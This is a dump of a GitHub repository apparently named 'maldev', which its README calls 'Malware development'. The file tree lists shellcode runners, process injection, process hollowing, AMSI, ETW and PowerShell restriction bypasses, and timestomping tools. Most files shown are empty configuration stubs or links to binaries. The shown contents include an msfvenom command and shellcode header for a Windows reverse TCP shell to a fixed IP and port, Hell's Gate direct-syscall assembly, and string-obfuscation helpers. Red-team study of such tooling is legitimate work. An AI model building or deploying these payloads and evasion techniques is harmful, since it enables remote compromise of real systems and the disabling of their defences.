├── C++
├── EarlyBird
│ ├── rcdata1.bin
│ ├── resource.h
│ ├── EarlyBird.vcxproj.filters
│ └── EarlyBird.rc
├── Thread_Context
│ ├── rcdata1.bin
│ ├── resource.h
│ ├── Thread_Context.vcxproj.filters
│ └── Thread_Context.rc
├── Shellcode_Launcher
│ ├── rcdata1.bin
│ ├── resource.h
│ ├── Shellcode_Launcher.vcxproj.filters
│ ├── Shellcode_Launcher.cpp
│ └── Shellcode_Launcher.rc
├── AES_Process_Injection
│ ├── rcdata1.bin
│ ├── messagebox64.bin
│ ├── resource1.h
│ ├── AES_Process_Injection.vcxproj.filters
│ └── AES_Process_Injection.rc
├── RC4_SysFunc032_Encrypter
│ ├── msgbox.bin
│ ├── payload.bin
│ ├── RC4_SysFunc032_Encrypter.rc
│ ├── resource.h
│ ├── typedefs.h
│ └── RC4_SysFunc032_Encrypter.vcxproj.filters
├── ServiceShell
│ ├── shellcode.h
│ ├── ServiceShell.vcxproj.filters
│ ├── malware.h
│ └── messages.h
├── HalosGate
│ ├── hellsgate.asm
│ ├── prototypes.h
│ └── HalosGate.vcxproj.filters
├── HellsGate
│ ├── HellsGate
│ │ ├── hellsgate.asm
│ │ └── HellsGate.vcxproj.filters
│ └── HellsGate.sln
├── Timestomp
│ ├── helpers.h
│ ├── typedefs.h
│ └── Timestomp.vcxproj.filters
├── format_to_char_array.py
├── SystemFunction032_RC4
│ ├── typedefs.h
│ └── SystemFunction032_RC4.vcxproj.filters
├── API_Hooking
│ ├── Detours
│ │ ├── ToHook
│ │ │ ├── hookme.cpp
│ │ │ └── ToHook.vcxproj.filters
│ │ └── HookExe
│ │ │ ├── detours
│ │ │ └── detver.h
│ │ │ ├── HookExe.vcxproj.filters
│ │ │ └── hookintoexe.cpp
│ ├── IAT_Hooking
│ │ └── IAT_Hooking.vcxproj.filters
│ ├── Inline-Minidump
│ │ └── Inline-Minidump.vcxproj.filters
│ ├── Inline-VirtualAlloc
│ │ └── Inline-VirtualAlloc.vcxproj.filters
│ └── UnHook-Ntdll-Exec
│ │ ├── UnHook-Ntdll-Exec.vcxproj.filters
│ │ └── proto.h
├── bin2uuid.py
├── aes_encrypt_py3.py
├── Heaven's_Gate
│ ├── wow64.h
│ ├── Heaven's_Gate.vcxproj.filters
│ └── pfndef.h
├── FunctionCast
│ ├── FunctionCast.cpp
│ └── FunctionCast.vcxproj.filters
├── GA_Runner
│ └── GA_Runner.vcxproj.filters
├── SCMDelivery
│ └── SCMDelivery.vcxproj.filters
├── minidump
│ └── minidump.vcxproj.filters
├── APC_Injection
│ └── APC_Injection.vcxproj.filters
├── AlternateDataStream
│ └── AlternateDataStream.vcxproj.filters
├── ETW
│ └── ETW-Silencer
│ │ ├── ETW-Silencer.vcxproj.filters
│ │ └── ETW-Silencer.cpp
├── SC_CreateFiber
│ └── SC_CreateFiber.vcxproj.filters
├── VirtualAlloc2
│ └── VirtualAlloc2.vcxproj.filters
├── Caesar_Encrypter
│ ├── Caesar_Encrypter.vcxproj.filters
│ └── Caesar_Encrypter.cpp
├── CreateThreadPool
│ └── CreateThreadPool.vcxproj.filters
├── Process_Ninjection
│ └── Process_Ninjection.vcxproj.filters
├── HeapAlloc_ShellCRunner
│ └── HeapAlloc_ShellCRunner.vcxproj.filters
├── aes_encrypt_py2.py
├── Reflective_DLLs
│ ├── ReflectiveLoader
│ │ └── ReflectiveLoader.vcxproj.filters
│ └── ReflectiveLoader_DLL
│ │ └── ReflectiveLoader_DLL.vcxproj.filters
├── MapViewSection_Injection
│ └── MapViewSection_Injection.vcxproj.filters
├── PPID-Spoofing
│ └── PPID-Spoofing.vcxproj.filters
├── NT_Shellcoderunner
│ ├── NT_Shellcoderunner.vcxproj.filters
│ └── proto.h
└── SysWhispers
│ ├── SysWhispers.vcxproj.filters
│ └── shellcode.h
├── CSharp
├── Hollow
│ ├── hollow.exe
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── DInvoke
│ ├── DInvoke_EarlyBird
│ │ ├── packages.config
│ │ ├── App.config
│ │ └── Properties
│ │ │ └── AssemblyInfo.cs
│ ├── DInvoke_VirtualAlloc
│ │ ├── packages.config
│ │ ├── App.config
│ │ └── Properties
│ │ │ └── AssemblyInfo.cs
│ ├── DInvoke_MapViewOfSection
│ │ ├── packages.config
│ │ ├── App.config
│ │ ├── Program.cs
│ │ └── Properties
│ │ │ └── AssemblyInfo.cs
│ ├── DInvoke_ProcessHollowing
│ │ ├── packages.config
│ │ ├── App.config
│ │ └── Properties
│ │ │ └── AssemblyInfo.cs
│ └── DInvoke_ProcessInjection
│ │ ├── packages.config
│ │ ├── App.config
│ │ └── Properties
│ │ └── AssemblyInfo.cs
├── PS_Inject
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── AES_SCRunner
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── DLL_Inject
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── SC_UUID_Runner
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── Shell_Service
│ ├── App.config
│ ├── Program.cs
│ ├── Service1.Designer.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── AES_SC_Encrypter
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── HeapAlloc_scRunner
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── Process_Injection
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ShellcodeRunner
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ETW
│ └── ETW-Silencer-CSharp
│ │ ├── App.config
│ │ └── Properties
│ │ └── AssemblyInfo.cs
├── Fileless_Delivery_SMB
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── Hollow_Caesar_ExNuma
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ShellcodeBuilder_Caesar
│ ├── App.config
│ ├── Caesar_Builder.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ShellcodeRunner_Caesar
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ShellcodeRunner_ExNuma
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── PS_Reflective_XOR_Builder
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ShellcodeBuilder_VBA_Caesar
│ ├── App.config
│ ├── SCBuilder_VBA_Caesar.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ShellcodeRunner_Caesar_ExNuma
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── EnumSystemCodePagesA_SC_Runner
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── NT_ProcessInjection
│ ├── packages.config
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── NT_ShellcodeRunner
│ ├── packages.config
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── Linux-Post-Exploitation
│ ├── shellcode_loader.c
│ ├── xor_shellcode_loader.c
│ ├── xor_shellcode_encoder.c
│ ├── xor_mprotect_shellrunner.c
│ └── shellcode_loader_mprotect.c
├── DLL_Shellcode_Runner
│ └── Properties
│ │ └── AssemblyInfo.cs
├── PS_Reflective_DLL_Inject
│ └── Properties
│ │ └── AssemblyInfo.cs
├── DLL_Shellcode_Runner_Caesar
│ └── Properties
│ │ └── AssemblyInfo.cs
├── DLL_Shellcode_Runner_Caesar_ExNuma
│ └── Properties
│ │ └── AssemblyInfo.cs
└── PS_Reflective_DLLInject_ExNuma_XOR
│ └── Properties
│ └── AssemblyInfo.cs
├── shellcodes
├── Calc
│ ├── calc-64.bin
│ ├── calc-64-thread.bin
│ ├── calc-64.txt
│ └── calc-64-thread.txt
├── MessageBox
│ ├── messagebox-64.bin
│ ├── messagebox-64-git.bin
│ ├── messagebox-64-thread.bin
│ ├── messagebox-64.txt
│ ├── messagebox-64-thread.txt
│ └── messagebox-64-git.txt
└── rc4_encrypt.py
├── ProcDump
├── ProcDump
│ ├── App.config
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── Program.cs
└── ProcDump.sln
├── PSLangBypass
├── PSLangBypass
│ ├── App.config
│ ├── packages.config
│ ├── LangBypass.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── PSLangBypass_SpawnShell
│ ├── App.config
│ ├── packages.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── PSLangBypass_InstallUtil_Bypass
│ ├── App.config
│ ├── packages.config
│ └── Properties
│ │ └── AssemblyInfo.cs
└── PSLangBypass.sln
├── PrintSpooferNET
├── PrintSpooferNET
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
└── PrintSpooferNET.sln
├── C_Headers
└── win32.h
├── Powershell_CLM_Bypass
└── PSLangBypass
│ ├── PSLangBypass
│ ├── App.config
│ ├── packages.config
│ ├── LangBypass.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
│ ├── PSLangBypass_SpawnShell
│ ├── App.config
│ ├── packages.config
│ └── Properties
│ │ └── AssemblyInfo.cs
│ └── PSLangBypass_InstallUtil_Bypass
│ ├── App.config
│ ├── packages.config
│ └── Properties
│ └── AssemblyInfo.cs
├── Powershell_CLM_Bypass_InstallUtil
├── packages.config
├── App.config
└── Properties
│ └── AssemblyInfo.cs
├── README.md
├── PowerShell
├── ps_tochar_encrypt_string.ps1
└── amsi-bypass.ps1
└── VisualBasic
├── vba_shellcode_runner.vb
└── vba_macro_inmeminj_timer.vb
/C++/EarlyBird/rcdata1.bin:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/CSharp/Hollow/hollow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/CSharp/Hollow/hollow.exe
--------------------------------------------------------------------------------
/shellcodes/Calc/calc-64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/shellcodes/Calc/calc-64.bin
--------------------------------------------------------------------------------
/C++/Thread_Context/rcdata1.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/Thread_Context/rcdata1.bin
--------------------------------------------------------------------------------
/C++/Shellcode_Launcher/rcdata1.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/Shellcode_Launcher/rcdata1.bin
--------------------------------------------------------------------------------
/shellcodes/Calc/calc-64-thread.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/shellcodes/Calc/calc-64-thread.bin
--------------------------------------------------------------------------------
/C++/AES_Process_Injection/rcdata1.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/AES_Process_Injection/rcdata1.bin
--------------------------------------------------------------------------------
/C++/RC4_SysFunc032_Encrypter/msgbox.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/RC4_SysFunc032_Encrypter/msgbox.bin
--------------------------------------------------------------------------------
/C++/RC4_SysFunc032_Encrypter/payload.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/RC4_SysFunc032_Encrypter/payload.bin
--------------------------------------------------------------------------------
/shellcodes/MessageBox/messagebox-64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/shellcodes/MessageBox/messagebox-64.bin
--------------------------------------------------------------------------------
/C++/AES_Process_Injection/messagebox64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/AES_Process_Injection/messagebox64.bin
--------------------------------------------------------------------------------
/shellcodes/MessageBox/messagebox-64-git.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/shellcodes/MessageBox/messagebox-64-git.bin
--------------------------------------------------------------------------------
/shellcodes/MessageBox/messagebox-64-thread.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/shellcodes/MessageBox/messagebox-64-thread.bin
--------------------------------------------------------------------------------
/C++/RC4_SysFunc032_Encrypter/RC4_SysFunc032_Encrypter.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/RC4_SysFunc032_Encrypter/RC4_SysFunc032_Encrypter.rc
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_EarlyBird/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_VirtualAlloc/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_MapViewOfSection/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_ProcessHollowing/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_ProcessInjection/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CSharp/Hollow/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/PS_Inject/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/AES_SCRunner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/DLL_Inject/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/SC_UUID_Runner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/Shell_Service/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/ProcDump/ProcDump/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/AES_SC_Encrypter/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/HeapAlloc_scRunner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/Process_Injection/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ETW/ETW-Silencer-CSharp/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/Fileless_Delivery_SMB/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/Hollow_Caesar_ExNuma/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeBuilder_Caesar/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner_Caesar/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner_ExNuma/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/PrintSpooferNET/PrintSpooferNET/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_EarlyBird/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_VirtualAlloc/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/PS_Reflective_XOR_Builder/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeBuilder_VBA_Caesar/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner_Caesar_ExNuma/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/C_Headers/win32.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include "winuser.h"
4 |
5 | typedef BOOL(WINAPI* fEnumDesktopsW)(
6 | IN OPTIONAL HWINSTA hwinsta,
7 | IN DESKTOPENUMPROCW lpEnumFunc,
8 | IN LPARAM lParam
9 | );
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass_SpawnShell/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_MapViewOfSection/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_ProcessHollowing/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_ProcessInjection/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/EnumSystemCodePagesA_SC_Runner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass_InstallUtil_Bypass/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_SpawnShell/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_InstallUtil_Bypass/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/C++/ServiceShell/shellcode.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // msfvenom -p windows/x64/shell_reverse_tcp lhost=10.129.120.41 lport=13337 -f c
4 | // Payload size: 460 bytes
5 | // Final size of c file : 1957 bytes
6 |
7 | unsigned char buf[] =
8 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
9 | "...";
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass_SpawnShell/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass_InstallUtil_Bypass/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_SpawnShell/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_InstallUtil_Bypass/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass_InstallUtil/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/C++/HalosGate/hellsgate.asm:
--------------------------------------------------------------------------------
1 | ; Hell's Gate
2 | ; Dynamic system call invocation
3 | ;
4 | ; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
5 |
6 | .data
7 | wSystemCall DWORD 000h
8 |
9 | .code
10 | HellsGate PROC
11 | mov wSystemCall, 000h
12 | mov wSystemCall, ecx
13 | ret
14 | HellsGate ENDP
15 |
16 | HellDescent PROC
17 | mov r10, rcx
18 | mov eax, wSystemCall
19 |
20 | syscall
21 | ret
22 | HellDescent ENDP
23 | end
24 |
--------------------------------------------------------------------------------
/C++/HellsGate/HellsGate/hellsgate.asm:
--------------------------------------------------------------------------------
1 | ; Hell's Gate
2 | ; Dynamic system call invocation
3 | ;
4 | ; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
5 |
6 | .data
7 | wSystemCall DWORD 000h
8 |
9 | .code
10 | HellsGate PROC
11 | mov wSystemCall, 000h
12 | mov wSystemCall, ecx
13 | ret
14 | HellsGate ENDP
15 |
16 | HellDescent PROC
17 | mov r10, rcx
18 | mov eax, wSystemCall
19 |
20 | syscall
21 | ret
22 | HellDescent ENDP
23 | end
24 |
--------------------------------------------------------------------------------
/C++/Timestomp/helpers.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 |
5 | #define NTDLL L"ntdll.dll"
6 |
7 | FARPROC _GetNtApiAddress(char *FunctionName) {
8 |
9 | HMODULE fHandle = NULL;
10 | FARPROC fAddress = NULL;
11 |
12 | fHandle = GetModuleHandle(NTDLL);
13 | if (fHandle == NULL) {
14 | return NULL;
15 | }
16 |
17 | fAddress = GetProcAddress(fHandle, FunctionName);
18 | if (fAddress == NULL) {
19 | return NULL;
20 | }
21 |
22 | return fAddress;
23 | }
--------------------------------------------------------------------------------
/C++/EarlyBird/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by EarlyBird.rc
4 | //
5 | #define IDR_RCDATA1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/CSharp/NT_ProcessInjection/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/CSharp/NT_ShellcodeRunner/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/C++/Thread_Context/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Thread_Context.rc
4 | //
5 | #define IDR_RCDATA1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/C++/Shellcode_Launcher/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Shellcode_Launcher.rc
4 | //
5 | #define IDR_RCDATA1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # maldev
2 | Malware development
3 |
4 | 1. VBA Gen: [trigen](https://github.com/karttoon/trigen)
5 | 2. HTA/VBA/DOCX: [macro_pack](https://github.com/sevagas/macro_pack)
6 | 3. Helper Tools: [DidierStevensSuite](https://github.com/DidierStevens/DidierStevensSuite)
7 | 4. Binary analysis of PE: [PEStudio](https://www.winitor.com/)
8 | 5. x64dbg: https://x64dbg.com/
9 |
10 | ## PE File Structure
11 |
12 | 
13 |
--------------------------------------------------------------------------------
/C++/AES_Process_Injection/resource1.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by AES_Process_Injection.rc
4 | //
5 | #define IDR_RCDATA1 103
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 104
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/C++/RC4_SysFunc032_Encrypter/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by RC4_SysFunc032_Encrypter.rc
4 | //
5 | #define IDR_SCODE1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/C++/format_to_char_array.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import sys
4 |
5 |
6 | if len(sys.argv) < 2:
7 | print("[*] Usage: ./program.py \"VirtualAlloc\"")
8 | sys.exit(0)
9 |
10 | _PROCNAME = sys.argv[1]
11 |
12 | def toArray(PROCNAME):
13 | initialise = "char str%s[] = { " % (_PROCNAME)
14 |
15 | fPROCNAME = ''
16 |
17 | for l in PROCNAME:
18 | fPROCNAME = '\'' + '\',\''.join(PROCNAME) + '\''
19 |
20 | _outFinal = initialise + fPROCNAME + ", 0x0};"
21 | return _outFinal
22 |
23 | print(toArray(_PROCNAME))
--------------------------------------------------------------------------------
/CSharp/NT_ProcessInjection/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/CSharp/NT_ShellcodeRunner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass_InstallUtil/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/PowerShell/ps_tochar_encrypt_string.ps1:
--------------------------------------------------------------------------------
1 | $payload = "enc.doc"
2 |
3 | [string]$output = ""
4 |
5 | $payload.ToCharArray() | %{
6 | [string]$thischar = [byte][char]$_ + 17
7 | if ($thischar.Length -eq 1)
8 | {
9 | $thischar = [string]"00" + $thischar
10 | $output += $thischar
11 | }
12 | elseif($thischar.Length -eq 2)
13 | {
14 | $thischar = [string]"0" + $thischar
15 | $output += $thischar
16 | }
17 | elseif($thischar.Length -eq 3)
18 | {
19 | $output += $thischar
20 | }
21 | }
22 | Write-Host "[*] String copied to clipboard"
23 | Write-Host "[*] Encrypted string:"
24 | Write-Host $output
25 | $output | clip
26 |
--------------------------------------------------------------------------------
/CSharp/Shell_Service/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.ServiceProcess;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 |
8 | namespace Shell_Service
9 | {
10 | internal static class Program
11 | {
12 | ///
13 | /// The main entry point for the application.
14 | ///
15 | static void Main()
16 | {
17 | ServiceBase[] ServicesToRun;
18 | ServicesToRun = new ServiceBase[]
19 | {
20 | new Service1()
21 | };
22 | ServiceBase.Run(ServicesToRun);
23 | }
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/C++/SystemFunction032_RC4/typedefs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | struct ustring {
5 | DWORD Length;
6 | DWORD MaximumLength;
7 | PUCHAR Buffer;
8 | } _data, key;
9 |
10 | typedef BOOL (WINAPI* SystemFunction040)
11 | (
12 | _In_ _Out_ PVOID Memory,
13 | _In_ ULONG MemorySize,
14 | _In_ ULONG OptionFlags
15 | );
16 |
17 | typedef BOOL (WINAPI* SystemFunction041)
18 | (
